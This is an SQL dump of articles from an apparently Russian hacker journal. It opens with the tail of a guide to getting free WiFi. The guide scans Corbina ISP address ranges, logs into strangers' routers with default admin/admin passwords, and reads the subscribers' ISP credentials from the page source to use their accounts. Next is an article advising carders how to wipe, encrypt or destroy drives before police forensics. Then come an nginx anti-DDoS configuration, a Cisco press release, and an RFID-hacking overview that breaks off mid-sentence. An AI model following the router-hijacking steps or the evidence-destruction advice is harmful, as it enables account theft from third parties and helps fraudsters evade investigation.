Пусть они будут у вас 111.111.111.111 и 222.222.222.222 (на самом деле они, конечно, будут другими). Не закрывая окна со статусом точки доступа, опять открываем свойства беспроводного подключения, протокол интернета TCP/IP и в полях предпочитаемый и альтернативный DNS вписываем то, что было статусе точки как Primary DNS и Secondary DNS(из написанного выше это 111.111.111.111 и 222.222.222.222). Нажимаем ОК, еще раз ОК. Подключитесь к точке еще раз (если вас выкинуло после нажатия ОК). ВСЕ. Настройка интернета закончена. Теперь можно и проверить его в действии. Открываем в браузере свой любимый сайт. Открылось? Поздравляю! Можете идти и рассказывать друзьям, какой вы гений и обмывать это дело. P.S. Ничего сложного тут нет, просто расписано подробно, на самом деле все это занимает не больше 1 минуты.<br /><br />Способ №2: Вот тут уже придется попотеть. Способ реализует вход через точки доступа Golden WIFI и Beeline WIFI (далее во всем тексте дабы не писать везде Golden WIFI и Beeline WIFI будет писаться просто GBWIFI )<br />Нам потребуется:<br />1)Программа Angry IP scanner ( http://www.web-hack.ru/download/?case=1 )<br />2)Браузер Mozilla Firefox ( http://www.mozilla-russia.org )<br />3)Рабочий проводной интернет<br />4)Сайт http://ipindex.homelinux.net/ для поиска списка IP адресов Корбины<br />5)Много пива/кофе/бутербродов<br /><br />Начнем.<br />Наша цель - Подключить инет через GBWIFI с помощью vpn корбины.<br />Так как в Москве около 10000 точек GBWIFI то проблемы с покрытием явно маловероятны.<br />Качаем Angry IP scanner.<br />Заходим на сайт http://ipindex.homelinux.net/ и вбиваем в поиск "CORBINA". Ищем самый большой ранг адресов (я нашел 89.178.0.0-89.178.255.255, а это 65000 адресов, в принципе достаточно). Открываем ipscan.exe из скачанного архива Angry IP. В IP range в левом столбике пишем 89.178.0.0, во втором 89.178.255.255. Ставим галку на Scan ports, жмем маленькую кнопку в виде троеточия чуть правее, убираем, если что то было в верхнем поле Ports и пишем туда "80" (без кавычек). Жмём ОК. Заходим в Options->Options и выбираем в поле Display справа: Only open ports. Жмем ОК & Save.<br />Еще раз проверяем все ли в порядке с подключением к интернету. Если все в норме - жмем Start. Теперь нам понадобится пункт 5, Употребляем пива/кофе/еду до того момента пока не начнут появляться в сканере зеленые кружочки с адресами.<br /><br /><br /><br />Выделяем 1 адрес и копируем его(или правой кнопкой: IP->Clipboard или Ctrl+C на выделенном адресе. Вставляем адрес 89.178.0.26(пример) в браузер. Если открывается какой нибудь сайт или ничего не открывает и пишет готово выбираем следующий IP адрес по списку и проделываем то же самое до того момента пока нам не предложат ввести логинпароль. Вводим в оба поля "admin"(без кавычек) Например это будет роутер WL500g.<br /><br /><br /><br />Откроется интерфейс этого роутера. В правом столбике выбираем "IP Config"(на разных модемах может быть по-разному). Далее жмем "WAN & LAN" (на разных моделях по-разному, суть одна - должны быть указаны данные подключения (логин и пароль под звездочками)). Так на открывшейся вкладке "WAN & LAN" мы видим User Name: vasya Password: ******. Так, логин мы теперь знаем. Нужно узнать и пароль. Жмем в поле где звездочки, правой кнопкой-->В этом фрейме-->Просмотр исходного кода фрейма. В открывшемся окне "Правка-->Поиск" вводим логин(в моем случае vasya) видим что то такого рода "value="vasya", прокручиваем на пару строчек вниз и видим "value="12345"(если посмотреть левее, то будет видно что там пристутствует слово password. И так, теперь мы знаем и логин и пароль от доступа к корбине. Заходим на сайт stat.corbina.ru, жмем ВХОД, вводим логин и пароль (в моем случае vasya:12345). Теперь мы находимся в панели управления. Мы можем видеть баланс пользователя, и ниже подключенные услуги.. из них нам нужны пункты "Подключить услугу «Corbina+WiFi»" и "Услуга IP-телефон (SIP) не подключена. ПОДКЛЮЧИТЬ". Про SIP телефон это отдельный разговор и опишу я его в другой теме, а WIFI мы сейчас же и подключим. Нажимаем на "Подключить услугу «Corbina+WiFi»" , жмем "Подключить" Через 10 минут будет доступна услуга GBWIFI. Закрываем все открытые окна. Отключаемся от проводного интернета. Включаем беспроводное соединение (Если вы пытались подключиться по первому способу не забудьте в настройках TCPIP поставить все на автоматическое получение IP. Подключаемся к сети GBWIFI. Подключились. Теперь надо создать vpn подключение для того чтобы подключиться к корбине через GBWIFI. Пуск-->Подключение-->отобразить Все подключения-->Создание нового подключения-->далее-->подкл. к сети на раб. столе-->Подкл. к виртуальной частной сети-->пишем название на ваше усмотрение-->не набирать номер(этого пункта может не быть)-->Имя компьютера или IP адрес пишем "vpn.corbina.net"-->добавляем ярлык и все готово. В открывшемся подключении: Свойства-->Безопасность-->убираем галку с "Требуется шифрование данных" потому что с этой галкой мы не сможем подключиться. Жмем ОК и вводим заполученные нами логин и пароль (в моем случае vasya:12345), подключаемся. Если подключение сразу сбрасывается. Проверьте, правильно ли подключена беспроводная сеть к GBWIFI. Если все вышеописанное сделано правильно то можете наслаждаться беспроводным интернетом за 0.0руб в месяц. (Не забудьте что требуется 10-15 минут чтобы подключить услугу «Corbina+WIFI».<br />P.S. Все эти действия в среднем занимают 5-7 минут по времени<br />P.P.S. Статья написана исключительно в ознакомительных целях. Автор не несет ответственности за проделанные деяния и тем более за испорченные нервы.","Бесплатный WIFI интернет<br />","journal_images/img_506760.png","1377068458","4");
INSERT INTO gazeta_article VALUES("148","22","Итак, Вы сделали осечку и к Вам едут дяди из управления К... Что делать??... Вот, как происходит сам процесс Вашего уличения в виновности ....<br /><br />Начнем по-порядку: <br /><br />Эксперитзу проводят несколько экспертов, у каждого из них свои методы и программы. Чем более грамотный и квалифицированный эксперт, тем больше у него средств работы, а соответственно и позможностей найти на твоей машине компромат. <br /><br />Вот всего-лишь возможные методы сбора информации: <br /><br />1) Тотальное изучение и анализ содержания всех незакриптованных файлов на машине. В принципе основное. Всегда что-то можно не уследить и забыть. Даже скриншот или запись разговора с кем-то по интернету... <br /><br />2) Работа Uneraser'aми (думаю, используется около 3-4 стандартных) + несколько специализированных, но которые тоже можно найти в интернете. Например Unformat, который восстанавливает даныне с полного форматирования на дискете - что неприятно. С винчестером я не пробовал. <br /><br />3) Анализ логов системы: <br /><br />а) логи фаерволов <br />б) последние документы <br />в) странцы в кэше <br />г) последние странцы <br />д) логи всех браузеров <br /><br />4) Переписка. Очень важный пункт. Не мало людей на нем проколось, т.к кOutlook Express или хранили почтовик (часто "The Bat") на системном разделе винта и не приптовали. Имейте ввиду, что многие почтовики, тот же "The Bat!", хранит пароли в реестре ОС. К этому пункту так же отностися и icq, чаты и всевозоможные другие OfflineOnline пэйджеры и средства общения. <br /><br />5) Спец методы, на которые нужны мощности и ресурсы. Доступны только компьютерным экспертам ФБС и выше. <br /><br />а) Взлом криптованных контейнеров (софт для этого есть), ломать долго и часто нереально. По этому этот пункт часто под вопросом, если только у вас не закриптованна информация международного заскреченного хакартера <br />б) Взлом запароленных архивов. Часто люди успокаиваются на этом и не криптуют информацию. Это не так сложно взломать и подобрать. При обнаружении таких ахивов над этим обязательно работают. <br />в) Автоматические анализаторы логов ОС - спецсофт <br />г) Уверен, тут есть очень много чего ещё можно добравить... <br /><br />Вот такой расклад. <br /><br />Хотелось бы услышать проверенные способы уничтожения винчестера. Можно больше оригинальности. <br /><br />Вот например: <br />1) в дверь из комнаты монтируется два МОЩНЫХ магнита (скрытно в косяк). Такие магниты можно приобрести только на Российских заводах, потому что нигде в другой стране Вам их не продадут. <br />2) как только приходят менты, магниты активируется (через ДУ или простым замыканием) <br />3) при выносе из комнаты умрет практически всё: винты, дискеты <br /><br />Кто может дать описания химического, физического странения винчестера? Какова гарантия, что винт может выжить после такого? <br /><br />Самый простой и эффективный способ: в столе выделяется ящик для хроанения банки с серной кислотой, в случае реальной опасности - винт опускается туда, и можно встречать гостей. Теоретически - достаточно 2-3 сек для ПОЛНОГО уничтожения всех данных. О том что емкость, в режиме ожидания, должна быть герметически закрыта говорить я думаю лишнее. <br /><br />Вступление <br /><br />Постараюсь ответить на все вопросы что вас интересуют. Итак... о полном уничтожении данных с hdd речи идти никак не может. Никакой специализированный софт не может дать 100% гарантии что с вашего жесткого диска удалена вся информация. Для примера: один мой знакомый работает начальником отдела инф. безопасности в одной крупной компании. Так вот у них, от отслуживших свое hdd избавляются путем помещения их в контейнер, в котором с нескольких сторон стоят очень мощные магниты. И то даже после этого их утилизируют только по истечении года с момента проведения процедуры. Рассчитывая на то, что если информацию с них и можно будет, как либо восстановить - то она уже будет не актуальна. Извиняюсь - отвлекся от темы. = ) <br /><br />Шифрование и т.д. <br /><br />Теперь о софте. Если вы всерьез задумываетесь о своей безопасности в случаи визита ментов, или ещё кого ни будь, то одними только вайперами тут не обойдешься. К ним ещё стоит приплюсовать, например PGP Disk для шифрования важных данных. Да, кстати все программы подобного рода проходят регистрацию в органах, так всеми любимые BestCrypt и drivecrypt в свое время прошли регистрацию в ФАПСИ, я думаю не надо объяснять, что там остаться лазейки для расшифровки. Говорят, что такая же участь постигла и PGP, и советуют юзать версии до 7. <br />Так же есть такой софт что создает шифрованный раздел на диске, в котором вы скажем поместили порнуху, а в этом разделе ещё один, но уже с важными данными. Т.н. отвод глаз. Название проги не помню - как вспомню отпишу. <br /><br />Экстренная очистка <br /><br />Так же неплохо было бы обзавестись чем то вроде harakiriy - софтинка которая удаляет выбранные вами файлы если например при загрузке компа в течении 5 секунд не нажать кнопку Z (или нажать). Такого софта достаточно много и выбор есть. <br /><br />Чистка <br /><br />Каждодневная чистка компа софтом вроде Acrinos Privacy Expert (возможно название написал неправильно). Или чем-то вроде этого. <br /><br />Форматирование <br /><br />Для форматирования диска необходимо использовать софт который не просто затирает данные, а трет их по одному из нескольких алгоритмов мирового стандарта. Такая процедура, правда, занимает часа 2-3, но зато и надежность такого метода гораздо выше чему у format C: <br /><br />Заключение <br /><br />На этом вроде все. О таких вещах как шифрование переписки по мылу и icq говорить не буду так это уже имхо паранойя.<br /><br /><br />P.S.<br />Статья взята не помню откуда... Расскажу как я слежу за безопасностью...<br />- Для чистки компа пользуюсь Privacy Guard. Удобная прога, масса возможностей. Даже если ты удалил просто файл и не затёр его, то она позволяет "затирать" свободное место на диске. Причём есть выбор сколько раз перезаписывать случайные 0 и 1 на винт. Есть возможность поиска на винте "опасной информации". Т.е. вводишь слова типа "кардинг, картон, сс..." и оно шарит по всему винту...<br /><br />- Также пользуюсь PGP 9.0.2. Тоже ахуенная прога! Создал 3 виртуальных диска по 100 метров. На одном нужная инфа, на 2-х других музыка и другая ***ня... Правда каждый раз после перезагрузки надо их "монтировать", но оно стоит того и уже я всё делаю на автомате. Для пароля лучше всего использовать отрывок из стиха. Можно, например, взять книгу любую и открыть на странице(короче использовать дату своего рождения или что-то ещё, чтоб потом вспомнить на какой странице и на какой строчке написан пароль).<br />Да... Кстати, обращаться надо ко всем 3-м дискам т.к. если будешь обращаться только к одному, то будут знать какой диск ломать надо. Короче в целом прога <br />Идеальный вариант - хранить эти зашифрованные диски на флэш. Т.е. когда ты монтируешь диск, то ты подключаешь файл *.pgd. Так вот если эти файлы держать на флэш, то вообще идеально будет. <br /><br />Можно всю инфу держать на простой болванке или на rw. Но это очень неудобно...<br />Если ты вбивала, то можно винду на флэш поставить и с неё грузиться когда "работаешь" (правда грузиться долговато и для этого флэшка нужна на 2 гига где-то)<br />Ну вот впринципе и всё... Если у кого-то есть вопросы или дополнения - пишите.<br /><br />","Ментовский софт или как обезопасить комп<br />","journal_images/img_538325.png","1377068495","4");
INSERT INTO gazeta_article VALUES("149","22","Nginx - веб сервер предназначеный для работы на высоконагруженных серверах. Ddos атака как раз и является той нагрузкой с которой этот web сервер может вполне удачно справится. Решения которые предоставляет Antiddos.org построены на кластерах под управлением FreeBSD и веб сервера Nginx. Мы провели очень много экспериментов по реакции nginx под нагрузкой и пришли к мнению что он является правильным выбором для работы на серверах которые подвергаются ddos атакам. Ниже привожу основные настройки данного сервера.<br /><br />FreeBSD, сетевая Intel fxp, порт 100Мбит, polling, http accept-filter<br />в sysctl<br /><br />Код:<br /><br />sysctl kern.maxfiles=90000<br />sysctl kern.maxfilesperproc=80000<br />sysctl net.inet.tcp.blackhole=2<br />sysctl net.inet.udp.blackhole=1<br />sysctl kern.polling.burst_max=1000<br />sysctl kern.polling.each_burst=50<br />sysctl kern.ipc.somaxconn=32768<br />sysctl net.inet.tcp.msl=3000<br />sysctl net.inet.tcp.maxtcptw=40960<br />sysctl net.inet.tcp.nolocaltimewait=1<br />sysctl net.inet.ip.portrange.first=1024<br />sysctl net.inet.ip.portrange.last=65535<br />sysctl net.inet.ip.portrange.randomized=0<br /><br /><br />в nginx моменты<br /><br /><br />Код:<br /><br />worker_processes 1;<br />worker_rlimit_nofile 80000;<br />events {<br />worker_connections 50000;<br />}<br /><br /><br />Код:<br /><br />server_tokens off;<br />log_format IP ‘$remote_addr’;<br />reset_timedout_connection on;<br /><br />listen xx.xx.xx.xx:80 default rcvbuf=8192 sndbuf=16384 backlog=32000 accept_filter=httpready;<br /><br /><br />фильтрацию url например по критерию POST index.php?actio<br /><br />Код:<br /><br />n=login<br />с пустым реферером можно реализовать так<br /><br />Код:<br /><br />set $add 1;<br />location /index.php {<br />limit_except GET POST {<br />deny all;<br />}<br />set $ban “”;<br />if ($http_referer = “” ) {set $ban $ban$add;}<br />if ($request_method = POST ) {set $ban $ban$add;}<br />if ($query_string = “action=login” ){set $ban $ban$add;}<br />if ($ban = 111 ) {<br />access_log /var/log/nginx/ban IP;<br />return 404;<br />}<br />proxy_pass http://127.0.0.1:8000; #тут живёт апач<br />}<br /><br /><br />Дальше резали на уровне pf - загружали в таблицу IP с которых приходило слишком<br />много хитов. PF с таблицами работает очень быстро. Исходники парсера логов есть на<br />http://www.comsys.com.ua/files.<br /><br />ну и по крону уже раз в минуту добавлять в ip table новые ip из лога<br /><br />25Мбитный DDoS, преимущесвенно режущийся ip, остатки проходят на nginx, который по критерию обучает ip и остатки проксирует на апач - LA 0, сайт работает.<br />","Настройка Nginx для отражения небольших ddos атак<br />","journal_images/img_355222.png","1377068561","4");
INSERT INTO gazeta_article VALUES("150","22","Компания Cisco объявила о расширении функциональности сетевой защиты, которое создает новые возможности для безопасного взаимодействия между продуктами и услугами, позволяя организациям более гибко и эффективно снижать риски и ликвидировать угрозы. <br /><br />Кроме того, новые возможности упрощают сетевое управление и лучше защищают обмен конфиденциальной информацией с удаленными пользователями.<br /><br /><br /><br />Расширенный портфель решений Cisco для безопасности включает четыре продукта: Intrusion Prevenyion System (IPS) 6.0, Cisco Security Agent (CSA) 5.2, Cisco Security Mitigation Analysis and Response Sustem (CS-MARS) 4.3 и Cisco Security Manager (CSM) 3.1, которые дают полное представление о ситуации, обеспечивают защиту всей сети, упрощают управление правилами, быстро и гибко реагируют на возникающие угрозы и поддерживают непрерывность бизнеса. Новые решения расширяют возможности скоординированной защиты за счет взаимодействия продуктов разного типа и одновременного учета требований сети и оконечных периферийных устройств. Это значит, что оно закрывает все потенциальные лазейки для злоумышленников. <br /><br /><br /><br />К примеру, обмен информацией между IPS 6.0 и CSA 5.2 минимизирует число ложных срабатываний и помогает устройствам IPS блокировать атаки до момента их массового распространения. Кроме того, в систему IPS 6.0 включены функции обнаружения аномального поведения, позволяющие надежно распознавать сетевых червей и другую вредную деятельность с помощью анализа сетевого трафика. Также появилась возможность интеграции со сканерами безопасности сторонних фирм, расширяющая возможности анализа угроз и принятия адекватных защитных мер. Среди других полезных функций решения Cisco можно отметить динамическое определение рейтинга каждой угрозы в зависимости от ее опасности и внедрение автоматических фильтров событий и вариантов реагирования для конкретной операционной системы. <br /><br /><br /><br />Скоординированная безопасность включает контроль качества обслуживания (QoS) и новые функции управления беспроводными сетями в системе CSA 5.2. Так, например, CSA 5.2 позволяет устанавливать правила для оконечных устройств (мобильных компьютеров), ограничивающие использование ненадежных идентификаторов беспроводных сетей (SSID) и методов шифрования и требующие использования защищенных виртуальных частных сетей (VPN) при работе вне офиса. Все это позволяет корпоративному заказчику повысить уровень защищенности мобильных сотрудников. <br /><br /><br /><br />В условиях тесного взаимодействия между IPS 6.0 и CSA 5.2 задача защиты всей сети решается на уровне системы CS-MARS, которая собирает всю необходимую информацию на одном устройстве, проводит сложный анализ сетевого поведения, распознает угрозы и координирует свои действия с системой CSM 3.1. Последняя в случае необходимости меняет правила безопасности в масштабе всего предприятия.<br /><br /><br /><br />Помимо системы скоординированной защиты, Cisco вывела на рынок и ряд новых функций SSL VPN для адаптивных устройств безопасности ASA (Adaptive Security Appliance), включающих встроенный межсетевой экран, IPS, защиту от шпионского ПО, вирусов, спама и функциональность виртуальных частных сетей (VPN). Последняя версия программного обеспечения ASA 8.0 поднимает решения SSL VPN на новый качественный уровень, дополняя проверенные решения Cisco IPsec функциями, которые сокращают общую стоимость владения ИТ-системами даже в условиях развития и расширения распределенной организации и повышения мобильности сотрудников.<br /><br />Новшества SSL VPN в системе ASA <br /><br />VPN без клиентов с усовершенствованным дизайном портала и широкими возможностями персонализации, включающими собственные закладки, данные RSS и локализацию. <br /><br />Клиент нового поколения Cisco AnyConnect VPN с широкой поддержкой операционных систем (Microsoft Windows Vista, MAC OS X, Linux). <br />Клиент Cisco AnyConnect Mobile VPN, поддерживающий операционную систему Windows Mobile 5.0 Pocket PC Edition. <br /><br />Оптимизированный доступ к сети для трафика "голос поверх IP" (VoIP) и другого трафика, чувствительного к задержкам. <br /><br />Создание "умных туннелей" (smart tunnels), предоставляющих приложениям, выполняющим правила безопасности, беспрепятственный доступ без дополнительной проверки прав. <br /><br />Встроенные средства аутентификации (Certificate Authority и другие). <br /><br />Прямое соотношение между членством в Windows Active Directory и VPN, упрощающее управление безопасностью за счет автоматического предоставления прав доступа пользователям виртуальной частной сети. <br /><br />Средства оценки состояния (posture-assessment extensions), повышающие эффективность изменения прав доступа для пользователей VPN. <br /><br />Интуитивное управление с помощью Adaptive Security Device Manager и CSM 3.1.","Cisco и самозащита для сетей<br />","journal_images/img_709264.png","1377068597","4");
INSERT INTO gazeta_article VALUES("151","21","RFID-хакинг<br />RFID-хакинг <br />{Вступление}<br /><br />Ты, конечно, уже не раз слышал о такой новомодной технологии как RFID. Все чаще можно слышать в прессе и в Интернете упоминания о ней, споры, возникающие между сторонниками и противниками повсеместного распространения этой технологии, а так же сводки на сайтах по информационной безопасности об угрозах, которые таит в себе слабая защищенность систем, использующих RFID. Эта статья расскажет тебе о новом направлении хакинга, только начинающем развиваться, об RFID-хаке.<br /><br />{Технология RFID}<br /><br />Начать повествование я решил с краткого описания технологии RFID. Вообще, RFID или Radio Frequency IDentification (радиочастотная идентификация) — это метод удаленного хранения и получения информации путем передачи радиосигналов с помощью устройств называемых RFID-метками. История появления данной технологии восходит к первой половине XX столетия. Британские ВВС еще в начале Второй мировой использовали подобную технологию, устанавливая на самолеты устройства радиочастотной идентификации, позволяющие эффективно отличать свои авиационные юниты от самолетов противника. Есть так же сведения, что в СССР в 50-х годах похожая технология использовалась для шпионажа. С 60-х годов начинаются исследования о возможности применения RFID в гражданских целях, а первая радиометка, аналогичная применяемым сегодня, была создана в научной лаборатории Лос Аламос в 1973 году.<br /><br />Принцип работы RFID-систем весьма прост. Данные системы включают в себя два основных компонента: считыватель (ридер) и идентификатор (метка, чип, тег). Ридер излучает электромагнитную энергию. Метка улавливает этот сигнал и передает ответный, который уже принимается антенной ридера.<br /><br />По своему типу системы RFID подразделяются на пассивные и интерактивные. В пассивной системе излучение считывателя постоянно во времени (т.е. не модулировано) и служит только источником питания для радиометки, которая собственного источника энергии не имеет. Получив энергию от ридера, метка включается и передает сигнал, который принимается считывателем. Вышеописанным способом работает большинство систем управления доступом, где необходимо только получить серийный номер идентификатора.<br /><br />Более продвинутые RFID-системы используют интерактивный режим работы. Ридер в таких системах излучает модулированные колебания, то есть формирует запрос. RFID-метка дешифрирует запрос, обрабатывает его, и, если это необходимо, формирует соответствующий ответ. Подобные системы необходимы, например, для работы с товарами, маркированными радиометками. Дело в том, что если система пассивная, то при попадании одновременно нескольких меток под излучение ридера их сигналы накладываются друг на друга и возникает коллизия. Интерактивные же системы снабжены механизмом антиколлизии. Интерактивные RFID-теги часто имеют встроенную батарею, заряда которой может хватить на несколько лет. Интерактивные метки с собственным источником питания называют активными, а те, что без него полупассивными.<br /><br />RFID-метки можно подразделить на несколько категорий. Во-первых, по используемому диапазону радиочастот на:<br />- низкочастотные (125 или 134.2 КГц);<br />- высокочастотные (13.56 МГц);<br />- UHF, т.е. ультравысокочастотные (868-956 МГц);<br />- микроволновые (2.45 ГГц).<br />Во-вторых, по размерам встроенной памяти, которая может быть от 4 байт до 4 Кб, кроме того метка может иметь память только для чтения или же с возможностью дозаписи и перезаписи информации. Существует несколько стандартов RFID-меток, сформировавшихся на сегодняшний день. Важным свойством радиометки является и ее размер, который может составлять всего 0.4х0.4 мм для пассивных меток, в то время как активные метки имеют размер с монету.<br /><br />{Применение: за и против}<br /><br />Применяться RFID может в самых разных областях. Во-первых, СКУД, т.е. системы контроля и управлением доступом. Исторически это было первым применением технологии RFID. Сегодня доступ в офис или дом с помощью proximity-карты со встроенным радиочипом уже вполне обычное дело. Большинство подобных систем используют пассивные метки и работают в низкочастотном диапазоне, хотя в последнее время все чаще встречаются интерактивные системы на частотах 13.56 МГц. Реально новое направление в этой области - создание RFID-имплантантов для людей. Первый эксперимент такого рода был проведен еще в 1988, а сегодня компания Applied Digital Solution предлагает любому желающему имплантировать себе в руку свою разработку - VeriChip.<br /><br /><br />[ клонер proximity-карт ]<br /><br />Во-вторых, это контроль за перевозкой грузов и конкретных товаров, их складской учет. Представь только, как просто будет проходить ревизия на складах или в супермаркетах - достаточно пройтись с ридером вдоль полок с товарами и все автоматически будет переучтено в БД товаров. Существует стандарт RFID называемый EPC (electronic product code), являющийся аналогом штрих-кодов. Специалисты считают, что в ближайшее десятилетие RFID-метка на каждом отдельном товаре станет таким же обычным явлением как сегодня штрих-код.<br /><br />Еще одна очень важная область применения RFID - это электронные документы. Государства многих стран, в том числе и России, планируют уже в самое ближайшее время начать встраивать RFID-метки в паспорта своих граждан. При этом в память имплантированной в паспорт метки будут заноситься не только обычные данные владельца (ФИО, год рождения и т.д.), но и биометрические признаки, а также цветное фото.<br /><br />Как это всегда бывает, у технологии, подобной RFID, появляется множество сторонников и противников. Несмотря на все удобства, привносимые применением RFID, у многих людей ее внедрение вызывает большие опасения. И не зря. Во-первых, радиометки по сути своей являются радиомаяками - ведь именно в этом качестве их использовала советская разведка в 50-х. И незаконное слежение еще не единственное, что вызывает опасения, гораздо большие опасения вызывает безопасность самой технологии. Сам Брюс Шнайер, на планы оснащения паспортов RFID-метками, заявил, что "это чистая угроза национальной безопасности".<br /><br /><br /><br />[ Процесс клонирования proximity-карты ]<br /><br />Конечно, такую важную технологию как RFID не могли оставить без внимания хакеры и различные исследователи информационной безопасности. Первое, на чем хотелось бы заострить внимание, это проблема, связанная с вмешательством с личную жизнь человека, которая возможно будет иметь место в самом обозримом будущем. Только представь, что государство или же крупные корпорации будут иметь под контролем тысячи считывателей радиометок, расположенных на входах в метро, в дверях супермаркета или просто посреди улиц. Такие считыватели способны накапливать информацию о нашем перемещении, о том какие товары мы только что приобрели в магазине. Конечно, сегодня это звучит несколько бредово, но пройдет, возможно, менее десятка лет, и наступит время, когда каждый из нас добровольно или же принудительно будет всегда носить с собой имплантированный под кожу идентификационный чип. Напоминает кино в жанре киберпанк? Как бы то ни было, все идет именно к этому.<br /><br />{RFID и хакеры}<br /><br />Австралийские исследователи компьютерной безопасности в апреле этого года опубликовали работу, в которой описывается возможность препятствованию считыванию информации RFID-ридером с метки. В их планах создание устройства, которое не позволит считывать информацию с RFID-меток без ведома их владельца. Они использовали метод, напоминающие DoS-атаку - радиоэфир захламляется огромным множеством сигналов, имитирующих сигналы меток. RFID-ридеры первого поколения, т.е. пассивные не имеют возможности считать данные с карты из-за вышеупомянутого явления - коллизии. Интересно, что более продвинутые интерактивные ридеры, как показали опыты, также напрочь уходят в даун.<br /><br />Но с созданием первого анти-RFID гаджета австралийцев опередили голландцы. В начале апреля на околокомпьютерных сайтах запестрила новость о разработанном сотрудниками Свободного университета Амстердама устройства, которое препятствует чтению RFID-меток и информирует владельца о подобных попытках. Данный девайс разрабатывался в рамках проекта RFID Guardian (http://www.rfidguardian.org) группой исследователей под руководством профессора Эндрю Таненбаума (Andrew Tanenbaum), который помимо этого занимается еще рядом проектов, посвященных безопасности RFID-систем. Разработанное голландцами устройство представляет собой КПК с 550Mhz процессором и 64 Мб памяти, оборудованный RFID-ридером и необходимым ПО.<br /><br /><br />[ Эта забавная радиометка на самом деле<br />карикатура от противников RFID ]<br /><br />Настоящие хакеры смотрели на проблему несколько иначе. Двое немецких компьютерщиков MiniMe и Mahajivana, состоящие в рядах "Хаоса", решили, что лучший способ обезопасить себя от угроз, которые может принести технология RFID, это простое уничтожение RFID-меток. Наиболее действенным способом убийства радиометок, обнаруженным хакерами, оказался помещение их на короткое время в микроволновку. Но далеко не любой предмет со встроенным RFID-чипом засунешь в микроволновую печь, поэтому был разработан девайс, названный RFID-Zapper. Создатели устройства решили, что стоимость его должна быть минимальна, поэтому использовали в качестве основы одноразовый фотоаппарат-мыльницу, который сможет раздобыть любой желающий. После некоторых усовершенствований вспышка такого фотоаппарата научилась создавать сильное электромагнитное поле наповал убивающее пассивные радиометки. Правда, пока только 13,56-мегагерцовые, но создатели Zapper'а обещают дальнейшее развитие проекта. RFID-Zapper вызвал большой интерес на состоявшемся некоторое время назад европейском 22-ом слете хакеров CCC, как у хакеров так и у прессы.<br /><br />{Клонирование}<br /><br />Кстати, эта самая пресса, сама того не подозревая, привлекает все больше хакеров к изучению RFID. Наибольшую шумиху среди техногиков, вызвала недавняя статья американской журналистки Эннели Ньюитц (Annalee Newitz) под названием "The RFID Hacking Underground", опубликованная в майском выпуске Wired (http://www.wired.com/wired/archive/14.05/rfid.html). Впервые о RFID-хаке говорилось как о новом направлении хакерства. Одним из "героев" этой статьи стал 23-хлетний студент Джонатан Вестхьюз (Jonathan Westhues), возможно, первый из хакеров, сконструировавший устройство, способное клонировать RFID-метки. Это устройство, прозванное им proxmark, впервые было собрано Джонатаном еще в 2003 году и умело клонировать мотороловский Flexpass, RFID-чип довольно часто используемый в proximity-картах систем аутентификации. С помощью proxmark'а, который легко умещался в кармане, Вестхьюз мог, приблизившись на достаточно близкое к человеку расстояние, незаметно клонировать, имеющуюся у того proximity-карту. И получить, таким образом, доступ туда, где его явно быть не должно.<br /><br />На протяжении всего этого времени Джонатан совершенствовал proxmark, и устройство уже получило третье рождение в виде proxmark3. Теперь оно обрело множество новых функций и умеет работать уже с большинством 125KHz и некоторыми 13.56MHz RFID-метками. Не так давно хакеру удалось клонировать даже VeriChip, который его производители преподносят как наиболее надежный способ уберечь данные, касающиеся, идентификации пользователя. На состоявшейся этим летом конференции HOPE (Hackers On Planet Earth) Number Six, Вестхьюз продемонстрировал чего на самом деле стоит разрекламированный VeriChip. Не обошлось там и без участия Эннели, которая, вероятно, чтобы привлечь большее внимание к данному мероприятию, ассистировала Джонатану с имплантированным в руку VeriChip'ом. Судя по тому, сколько сообщений об этом "взломе" появилось в инете, представление им удалось .<br /><br />Если тебя заинтересовал девайс Вестхьюза, то тебе необходимо обязательно посетить его сайт: http://cq.cx . Там ты найдешь все наработки Джонатана по конструированию RFID-клонеров и даже сможешь скачать архивчик со всеми схемами, описаниями и ПО, необходимыми для конструирования proxmark3.<br /><br />Конечно, клонировать интерактивную RFID-метку задача гораздо более сложная, поэтому, думаю, в скором времени системы идентификации с пассивными метками уйдут в прошлое. Преимущество интерактивных систем, помимо всего прочего, это возможность использования шифрования для защиты информации. На самом деле такие системы уже давно не редкость, к примеру, автомобильные иммобилайзеры, набирающие все большую популярность, или, те карты, что используются в Московском метрополитене еще с 1998 года. Подобную же систему использовала компания ExxonMobil с 1997 года.<br /><br />{Проблемы шифрования}<br /><br />ExxonMobil - крупнейшая нефтяная корпорация, владеющая сетью бензозаправочных станций в США. Она внедрила на своих заправочных станциях инновационную платежную систему SpeedPass: оплата осуществлялась с помощью брелока с RFID-чипом внутри, на котором записаны данные о платежном счете его владельца в системе SpeedPass. Трое исследователей компьютерной безопасности Стив Боно (Steve Bono), Мэтью Грин (Matthew Green) и Адам Стаблфилд (Adam Stubblefield) конкретно взялись за изучение этой системы. RFID-чипы, использовавшиеся в этой системе, представляли собой разработку Texas Instruments под названием Digital Signature Transponder (DST).<br /><br />DST - это полупассивная радиометка с системой 40-битного шифрования. Хотя 40-битное шифрование сегодня достаточно легко вскрываются брутфорсом, сложность вскрытия ключа заключалась в том, что сам алгоритм шифрования взломщикам был неизвестен. Но парням удалось восстановить его, используя различные криптоаналитические методы. Затем они собрали мощный кластер, который смог расшифровывать по 5 ключей менее чем за 2 часа. Позже было сконструировано устройство, эмулирующее работу DST, которое было проверено в действии на одной из станций ExxonMobil. После того как представители ExxonMobil ознакомились с результатами этого исследования (http://rfidanalysis.org), то заявили в прессе, что исследование "лабораторное" и на практике все это не реализуемо. Но компания все же решила перестраховаться и перейти на чипы с 128-битным шифрованием.<br /><br />Посмотрим, как обстоит дело с криптозащитой в таком важном сегодня направлении как электронные документы. Нидерландские спецы по информационной безопасности из фирмы Riscure первыми взломали прототип электронного паспорта, который собираются вводить в Евросоюзе. Удалось им это вследствие достаточно простого алгоритма, примененного для шифрования личных данных владельца. Такая информация, как день рождения владельца паспорта, серийный номер, срок окончания его действия, легко предсказуема, и помогла "взломщикам" расшифровать остальное содержимое памяти радиометки.<br /><br />Окончательно добил все представления о самой возможности безопасной RFID известнейший криптолог, профессор Института Вейсмана, Ади Шамир (Adi Shamir). Исследования Шамир проводил на RFID-метках стандарта EPC (один из наиболее перспективных стандартов на сегодняшний день), работающих в UHF-диапазоне частот и использующих 8-ми и 32-битное шифрование данных. Для подбора ключа использовалась направленная антенна и цифровой осциллограф. Выяснилось, что при посылке чипу неверного бита ключа шифра, энергопотребление RFID-чипа несколько возрастает, что может быть зафиксировано несложной 